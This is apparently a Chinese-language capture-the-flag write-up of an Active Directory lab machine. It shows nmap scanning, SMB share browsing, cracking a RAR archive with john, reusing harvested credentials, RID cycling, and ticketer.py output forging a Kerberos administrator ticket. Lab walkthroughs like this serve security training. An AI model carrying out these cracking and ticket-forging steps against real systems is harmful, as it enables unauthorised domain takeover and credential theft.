Notes: Well, no more easy kakes. Hope you enjoy this one too.
前期踩点
1 2 3 4 5 6 7 8 9 10 11 12 13 14
⚡ root@kali ~/Desktop/test/listen11 nmap -sP 192.168.56.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:06 EST Nmap scan report for 192.168.56.1 Host is up (0.00039s latency). MAC Address: 0A:00:27:00:00:09 (Unknown) Nmap scan report for 192.168.56.2 Host is up (0.00032s latency). MAC Address: 08:00:27:F3:E1:79 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.126 Host is up (0.00068s latency). MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.56.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.03 seconds
⚡ root@kali ~/Desktop/test/listen11 nmap -sT -min-rate 10000 -p- 192.168.56.126 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:06 EST Nmap scan report for 192.168.56.126 Host is up (0.00084s latency). Not shown: 65517 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49668/tcp open unknown 49674/tcp open unknown 49687/tcp open unknown MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC)
⚡ root@kali ~/Desktop/test/listen11 nmap -sT -A -T4 -O -p 80,135,139,445,389 192.168.56.126 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:10 EST Nmap scan report for 192.168.56.126 Host is up (0.00061s latency).
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12) |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 |_http-title: Did not follow redirect to http://soupedecode.local 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%) OS CPE: cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 1121H2 (91%), Microsoft Windows Server 2016 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE HOP RTT ADDRESS 10.61 ms 192.168.56.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.09 seconds
⚡ root@kali ~/Desktop/test/listen11 nmap -script=vuln -p 445,389,80,88 192.168.56.126 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 03:15 EST Stats: 0:02:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.21% done; ETC: 03:18 (0:00:01 remaining) Nmap scan report for SOUPEDECODE.LOCAL0 (192.168.56.126) Host is up (0.00069s latency). PORT STATE SERVICE 80/tcp open http |_http-trace: TRACE is enabled |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /icons/: Potentially interesting folder w/ directory listing | /licenses/: Potentially interesting directory w/ listing on 'apache/2.4.58 (win64) openssl/3.1.3 php/8.2.12' | /server-info/: Potentially interesting folder |_ /server-status/: Potentially interesting folder 88/tcp open kerberos-sec 389/tcp open ldap 445/tcp open microsoft-ds MAC Address: 08:00:27:00:05:AB (Oracle VirtualBox virtual NIC) Host script results: |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_smb-vuln-ms10-054: false Nmap done: 1 IP address (1 host up) scanned in 321.27 seconds
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.56.126 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
在websvc用户的家目录可以找到UserFlag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
smb: \users\> ls . DR 0 Wed Nov 6 20:55:53 2024 .. DHS 0 Tue Nov 5 18:30:29 2024 Administrator D 0 Sat Jun 15 15:56:40 2024 All Users DHSrn 0 Sat May 8 04:26:16 2021 Default DHR 0 Sat Jun 15 22:51:08 2024 Default User DHSrn 0 Sat May 8 04:26:16 2021 desktop.ini AHS 174 Sat May 8 04:14:03 2021 fjudy998 D 0 Wed Nov 6 20:55:33 2024 ojake987 D 0 Wed Nov 6 20:55:16 2024 Public DR 0 Sat Jun 15 13:54:32 2024 rtina979 D 0 Wed Nov 6 20:54:39 2024 websvc D 0 Wed Nov 6 20:44:11 2024 xursula991 D 0 Wed Nov 6 20:55:28 2024
12942591 blocks of size 4096. 10834983 blocks available
1 2 3 4 5 6 7 8 9
smb: \Users\websvc\Desktop\> dir . DR 0 Thu Nov 7 14:08:21 2024 .. D 0 Wed Nov 6 20:44:11 2024 user.txt A 32 Thu Nov 7 05:07:55 2024
12942591 blocks of size 4096. 10835331 blocks available smb: \Users\websvc\Desktop\> mget user.txt Get file user.txt? y getting file \Users\websvc\Desktop\user.txt of size 32 as user.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \Users\rtina979\Documents\> ls . DR 0 Thu Nov 7 17:35:52 2024 .. D 0 Wed Nov 6 20:54:39 2024 My Music DHSrn 0 Wed Nov 6 20:54:39 2024 My Pictures DHSrn 0 Wed Nov 6 20:54:39 2024 My Videos DHSrn 0 Wed Nov 6 20:54:39 2024 Report.rar A 712046 Thu Nov 7 08:35:49 2024
12942591 blocks of size 4096. 11014679 blocks available smb: \Users\rtina979\Documents\> get Report.rar getting file \Users\rtina979\Documents\Report.rar of size 712046 as Report.rar (26744.4 KiloBytes/sec) (average 26744.5 KiloBytes/sec)
使用john对其破解密码
1 2 3 4 5 6 7 8 9 10 11 12 13
⚡ root@kali ~/Desktop/test/DC04 rar2john Report.rar > hash ⚡ root@kali ~/Desktop/test/DC04 cathash Report.rar:$rar5$16$7b74f4c32feb807c16edc906c283e524$15$872f8d1a914bd1503dac110c7bbb938a$8$3e15430028d503b5 ⚡ root@kali ~/Desktop/test/DC04 john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x]) Cost 1 (iteration count) is 32768 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status PASSWORD123 (Report.rar) 1g 0:00:01:29 DONE (2025-02-14 07:27) 0.01115g/s 573.9p/s 573.9c/s 573.9C/s chitra..2pac4ever Use the "--show" option to display all of the cracked passwords reliably Session completed.
得到密码PASSWORD123 ,解压是一个html文件,是对目标编辑进行渗透测试的报告
我么从中获取一些有用的信息
1 2 3 4 5 6 7 8 9 10 11
file_svc:Password123!!
RID cycling: DC01$, boliver0, zximena1, emark2, isam3, wulysses4, etc.
[*] Creating basic skeleton ticket and PAC Infos /root/.local/bin/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). aTime = timegm(datetime.datetime.utcnow().timetuple()) [*] Customizing ticket for SOUPEDECODE.LOCAL/administrator /root/.local/bin/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration)) /root/.local/bin/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) /root/.local/bin/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart /root/.local/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in administrator.ccache
